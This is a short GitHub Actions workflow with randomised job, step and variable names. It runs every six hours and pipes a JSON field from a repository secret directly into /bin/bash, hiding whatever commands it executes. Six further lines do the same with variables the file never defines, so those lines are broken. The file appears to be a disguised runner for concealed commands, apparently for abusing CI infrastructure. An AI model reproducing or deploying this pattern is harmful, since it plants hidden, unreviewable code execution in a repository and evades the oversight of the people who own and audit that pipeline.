name: jixinyue4318
on:
  workflow_dispatch:
  schedule:
    - cron: '23 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jixinyue4318
        env:
          tyma5: ${{ secrets.tyma5 }}
        run: |
          echo $tyma5 | jq -r .czjus7795 | /bin/bash
          echo $ubxuu62 | jq -r .g393 | /bin/bash
          echo $vvn84493 | jq -r .cr7923 | /bin/bash
          echo $m66510 | jq -r .aa66 | /bin/bash
          echo $egefr787 | jq -r .o9920 | /bin/bash
          echo $avkm695 | jq -r .fo0940 | /bin/bash
          echo $zu9 | jq -r .kuyya5 | /bin/bash

